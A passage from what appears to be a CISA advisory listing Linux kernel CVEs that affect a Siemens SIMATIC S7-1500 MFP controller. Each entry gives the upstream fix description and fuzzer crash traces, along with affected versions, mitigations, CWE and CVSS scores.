<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21867</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: bpf, test_run: Fix use-after-free issue in eth_skb_pkt_type() KMSAN reported a use-after-free issue in eth_skb_pkt_type()[1]. The cause of the issue was that eth_skb_pkt_type() accessed skb's data that didn't contain an Ethernet header. This occurs when bpf_prog_test_run_xdp() passes an invalid value as the user_data argument to bpf_test_init(). Fix this by returning an error when user_data is less than ETH_HLEN in bpf_test_init(). Additionally, remove the check for "if (user_size &gt; size)" as it is unnecessary. [1] BUG: KMSAN: use-after-free in eth_skb_pkt_type include/linux/etherdevice.h:627 [inline] BUG: KMSAN: use-after-free in eth_type_trans+0x4ee/0x980 net/ethernet/eth.c:165 eth_skb_pkt_type include/linux/etherdevice.h:627 [inline] eth_type_trans+0x4ee/0x980 net/ethernet/eth.c:165 __xdp_build_skb_from_frame+0x5a8/0xa50 net/core/xdp.c:635 xdp_recv_frames net/bpf/test_run.c:272 [inline] xdp_test_run_batch net/bpf/test_run.c:361 [inline] bpf_test_run_xdp_live+0x2954/0x3330 net/bpf/test_run.c:390 bpf_prog_test_run_xdp+0x148e/0x1b10 net/bpf/test_run.c:1318 bpf_prog_test_run+0x5b7/0xa30 kernel/bpf/syscall.c:4371 __sys_bpf+0x6a6/0xe20 kernel/bpf/syscall.c:5777 __do_sys_bpf kernel/bpf/syscall.c:5866 [inline] __se_sys_bpf kernel/bpf/syscall.c:5864 [inline] __x64_sys_bpf+0xa4/0xf0 kernel/bpf/syscall.c:5864 x64_sys_call+0x2ea0/0x3d90 arch/x86/include/generated/asm/syscalls_64.h:322 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xd9/0x1d0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f Uninit was created at: free_pages_prepare mm/page_alloc.c:1056 [inline] free_unref_page+0x156/0x1320 mm/page_alloc.c:2657 __free_pages+0xa3/0x1b0 mm/page_alloc.c:4838 bpf_ringbuf_free kernel/bpf/ringbuf.c:226 [inline] ringbuf_map_free+0xff/0x1e0 kernel/bpf/ringbuf.c:235 bpf_map_free kernel/bpf/syscall.c:838 [inline] bpf_map_free_deferred+0x17c/0x310 kernel/bpf/syscall.c:862 process_one_work kernel/workqueue.c:3229 [inline] process_scheduled_works+0xa2b/0x1b60 kernel/workqueue.c:3310 worker_thread+0xedf/0x1550 kernel/workqueue.c:3391 kthread+0x535/0x6b0 kernel/kthread.c:389 ret_from_fork+0x6e/0x90 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 CPU: 1 UID: 0 PID: 17276 Comm: syz.1.16450 Not tainted 6.12.0-05490-g9bb88c659673 #8 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-3.fc41 04/01/2014</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21867">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21875</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: mptcp: always handle address removal under msk socket lock Syzkaller reported a lockdep splat in the PM control path: WARNING: CPU: 0 PID: 6693 at ./include/net/sock.h:1711 sock_owned_by_me include/net/sock.h:1711 [inline] WARNING: CPU: 0 PID: 6693 at ./include/net/sock.h:1711 msk_owned_by_me net/mptcp/protocol.h:363 [inline] WARNING: CPU: 0 PID: 6693 at ./include/net/sock.h:1711 mptcp_pm_nl_addr_send_ack+0x57c/0x610 net/mptcp/pm_netlink.c:788 Modules linked in: CPU: 0 UID: 0 PID: 6693 Comm: syz.0.205 Not tainted 6.14.0-rc2-syzkaller-00303-gad1b832bf1cf #0 Hardware name: Google Compute Engine/Google Compute Engine, BIOS Google 12/27/2024 RIP: 0010:sock_owned_by_me include/net/sock.h:1711 [inline] RIP: 0010:msk_owned_by_me net/mptcp/protocol.h:363 [inline] RIP: 0010:mptcp_pm_nl_addr_send_ack+0x57c/0x610 net/mptcp/pm_netlink.c:788 Code: 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc e8 ca 7b d3 f5 eb b9 e8 c3 7b d3 f5 90 0f 0b 90 e9 dd fb ff ff e8 b5 7b d3 f5 90 &lt;0f&gt; 0b 90 e9 3e fb ff ff 44 89 f1 80 e1 07 38 c1 0f 8c eb fb ff ff RSP: 0000:ffffc900034f6f60 EFLAGS: 00010283 RAX: ffffffff8bee3c2b RBX: 0000000000000001 RCX: 0000000000080000 RDX: ffffc90004d42000 RSI: 000000000000a407 RDI: 000000000000a408 RBP: ffffc900034f7030 R08: ffffffff8bee37f6 R09: 0100000000000000 R10: dffffc0000000000 R11: ffffed100bcc62e4 R12: ffff88805e6316e0 R13: ffff88805e630c00 R14: dffffc0000000000 R15: ffff88805e630c00 FS: 00007f7e9a7e96c0(0000) GS:ffff8880b8600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000001b2fd18ff8 CR3: 0000000032c24000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: mptcp_pm_remove_addr+0x103/0x1d0 net/mptcp/pm.c:59 mptcp_pm_remove_anno_addr+0x1f4/0x2f0 net/mptcp/pm_netlink.c:1486 mptcp_nl_remove_subflow_and_signal_addr net/mptcp/pm_netlink.c:1518 [inline] mptcp_pm_nl_del_addr_doit+0x118d/0x1af0 net/mptcp/pm_netlink.c:1629 genl_family_rcv_msg_doit net/netlink/genetlink.c:1115 [inline] genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0xb1f/0xec0 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x206/0x480 net/netlink/af_netlink.c:2543 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1322 [inline] netlink_unicast+0x7f6/0x990 net/netlink/af_netlink.c:1348 netlink_sendmsg+0x8de/0xcb0 net/netlink/af_netlink.c:1892 sock_sendmsg_nosec net/socket.c:718 [inline] __sock_sendmsg+0x221/0x270 net/socket.c:733 ____sys_sendmsg+0x53a/0x860 net/socket.c:2573 ___sys_sendmsg net/socket.c:2627 [inline] __sys_sendmsg+0x269/0x350 net/socket.c:2659 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7f7e9998cde9 Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 &lt;48&gt; 3d 01 f0 ff ff 73 01 c3 48 c7 c1 a8 ff ff ff f7 d8 64 89 01 48 RSP: 002b:00007f7e9a7e9038 EFLAGS: 00000246 ORIG_RAX: 000000000000002e RAX: ffffffffffffffda RBX: 00007f7e99ba5fa0 RCX: 00007f7e9998cde9 RDX: 000000002000c094 RSI: 0000400000000000 RDI: 0000000000000007 RBP: 00007f7e99a0e2a0 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 R13: 0000000000000000 R14: 00007f7e99ba5fa0 R15: 00007fff49231088 Indeed the PM can try to send a RM_ADDR over a msk without acquiring first the msk socket lock. The bugged code-path comes from an early optimization: when there are no subflows, the PM should (usually) not send RM_ADDR notifications. The above statement is incorrect, as without locks another process could concur ---truncated---</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21875">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21887</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: ovl: fix UAF in ovl_dentry_update_reval by moving dput() in ovl_link_up The issue was caused by dput(upper) being called before ovl_dentry_update_reval(), while upper-&gt;d_flags was still accessed in ovl_dentry_remote(). Move dput(upper) after its last use to prevent use-after-free. BUG: KASAN: slab-use-after-free in ovl_dentry_remote fs/overlayfs/util.c:162 [inline] BUG: KASAN: slab-use-after-free in ovl_dentry_update_reval+0xd2/0xf0 fs/overlayfs/util.c:167 Call Trace: __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0x116/0x1f0 lib/dump_stack.c:114 print_address_description mm/kasan/report.c:377 [inline] print_report+0xc3/0x620 mm/kasan/report.c:488 kasan_report+0xd9/0x110 mm/kasan/report.c:601 ovl_dentry_remote fs/overlayfs/util.c:162 [inline] ovl_dentry_update_reval+0xd2/0xf0 fs/overlayfs/util.c:167 ovl_link_up fs/overlayfs/copy_up.c:610 [inline] ovl_copy_up_one+0x2105/0x3490 fs/overlayfs/copy_up.c:1170 ovl_copy_up_flags+0x18d/0x200 fs/overlayfs/copy_up.c:1223 ovl_rename+0x39e/0x18c0 fs/overlayfs/dir.c:1136 vfs_rename+0xf84/0x20a0 fs/namei.c:4893 ...</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21887">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21913</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: x86/amd_nb: Use rdmsr_safe() in amd_get_mmconfig_range() Xen doesn't offer MSR_FAM10H_MMIO_CONF_BASE to all guests. This results in the following warning: unchecked MSR access error: RDMSR from 0xc0010058 at rIP: 0xffffffff8101d19f (xen_do_read_msr+0x7f/0xa0) Call Trace: xen_read_msr+0x1e/0x30 amd_get_mmconfig_range+0x2b/0x80 quirk_amd_mmconfig_area+0x28/0x100 pnp_fixup_device+0x39/0x50 __pnp_add_device+0xf/0x150 pnp_add_device+0x3d/0x100 pnpacpi_add_device_handler+0x1f9/0x280 acpi_ns_get_device_callback+0x104/0x1c0 acpi_ns_walk_namespace+0x1d0/0x260 acpi_get_devices+0x8a/0xb0 pnpacpi_init+0x50/0x80 do_one_initcall+0x46/0x2e0 kernel_init_freeable+0x1da/0x2f0 kernel_init+0x16/0x1b0 ret_from_fork+0x30/0x50 ret_from_fork_asm+0x1b/0x30 based on quirks for a "PNP0c01" device. Treating MMCFG as disabled is the right course of action, so no change is needed there. This was most likely exposed by fixing the Xen MSR accessors to not be silently-safe.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21913">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.3</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L">CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21919</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: sched/fair: Fix potential memory corruption in child_cfs_rq_on_list child_cfs_rq_on_list attempts to convert a 'prev' pointer to a cfs_rq. This 'prev' pointer can originate from struct rq's leaf_cfs_rq_list, making the conversion invalid and potentially leading to memory corruption. Depending on the relative positions of leaf_cfs_rq_list and the task group (tg) pointer within the struct, this can cause a memory fault or access garbage data. The issue arises in list_add_leaf_cfs_rq, where both cfs_rq-&gt;leaf_cfs_rq_list and rq-&gt;leaf_cfs_rq_list are added to the same leaf list. Also, rq-&gt;tmp_alone_branch can be set to rq-&gt;leaf_cfs_rq_list. This adds a check `if (prev == &amp;rq-&gt;leaf_cfs_rq_list)` after the main conditional in child_cfs_rq_on_list. This ensures that the container_of operation will convert a correct cfs_rq struct. This check is sufficient because only cfs_rqs on the same CPU are added to the list, so verifying the 'prev' pointer against the current rq's list head is enough. Fixes a potential memory corruption issue that due to current struct layout might not be manifesting as a crash but could lead to unpredictable behavior when the layout changes.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21919">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/787.html">CWE-787 Out-of-bounds Write</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21925</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: llc: do not use skb_get() before dev_queue_xmit() syzbot is able to crash hosts [1], using llc and devices not supporting IFF_TX_SKB_SHARING. In this case, e1000 driver calls eth_skb_pad(), while the skb is shared. Simply replace skb_get() by skb_clone() in net/llc/llc_s_ac.c Note that e1000 driver might have an issue with pktgen, because it does not clear IFF_TX_SKB_SHARING, this is an orthogonal change. We need to audit other skb_get() uses in net/llc. [1] kernel BUG at net/core/skbuff.c:2178 ! Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI CPU: 0 UID: 0 PID: 16371 Comm: syz.2.2764 Not tainted 6.14.0-rc4-syzkaller-00052-gac9c34d1e45a #0 Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:pskb_expand_head+0x6ce/0x1240 net/core/skbuff.c:2178 Call Trace: __skb_pad+0x18a/0x610 net/core/skbuff.c:2466 __skb_put_padto include/linux/skbuff.h:3843 [inline] skb_put_padto include/linux/skbuff.h:3862 [inline] eth_skb_pad include/linux/etherdevice.h:656 [inline] e1000_xmit_frame+0x2d99/0x5800 drivers/net/ethernet/intel/e1000/e1000_main.c:3128 __netdev_start_xmit include/linux/netdevice.h:5151 [inline] netdev_start_xmit include/linux/netdevice.h:5160 [inline] xmit_one net/core/dev.c:3806 [inline] dev_hard_start_xmit+0x9a/0x7b0 net/core/dev.c:3822 sch_direct_xmit+0x1ae/0xc30 net/sched/sch_generic.c:343 __dev_xmit_skb net/core/dev.c:4045 [inline] __dev_queue_xmit+0x13d4/0x43e0 net/core/dev.c:4621 dev_queue_xmit include/linux/netdevice.h:3313 [inline] llc_sap_action_send_test_c+0x268/0x320 net/llc/llc_s_ac.c:144 llc_exec_sap_trans_actions net/llc/llc_sap.c:153 [inline] llc_sap_next_state net/llc/llc_sap.c:182 [inline] llc_sap_state_process+0x239/0x510 net/llc/llc_sap.c:209 llc_ui_sendmsg+0xd0d/0x14e0 net/llc/af_llc.c:993 sock_sendmsg_nosec net/socket.c:718 [inline]</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21925">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2025-21926</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: gso: fix ownership in __udp_gso_segment In __udp_gso_segment the skb destructor is removed before segmenting the skb but the socket reference is kept as-is. This is an issue if the original skb is later orphaned as we can hit the following bug: kernel BUG at ./include/linux/skbuff.h:3312! (skb_orphan) RIP: 0010:ip_rcv_core+0x8b2/0xca0 Call Trace: ip_rcv+0xab/0x6e0 __netif_receive_skb_one_core+0x168/0x1b0 process_backlog+0x384/0x1100 __napi_poll.constprop.0+0xa1/0x370 net_rx_action+0x925/0xe50 The above can happen following a sequence of events when using OpenVSwitch, when an OVS_ACTION_ATTR_USERSPACE action precedes an OVS_ACTION_ATTR_OUTPUT action: 1. OVS_ACTION_ATTR_USERSPACE is handled (in do_execute_actions): the skb goes through queue_gso_packets and then __udp_gso_segment, where its destructor is removed. 2. The segments' data are copied and sent to userspace. 3. OVS_ACTION_ATTR_OUTPUT is handled (in do_execute_actions) and the same original skb is sent to its path. 4. If it later hits skb_orphan, we hit the bug. Fix this by also removing the reference to the socket in __udp_gso_segment.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2025-21926">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
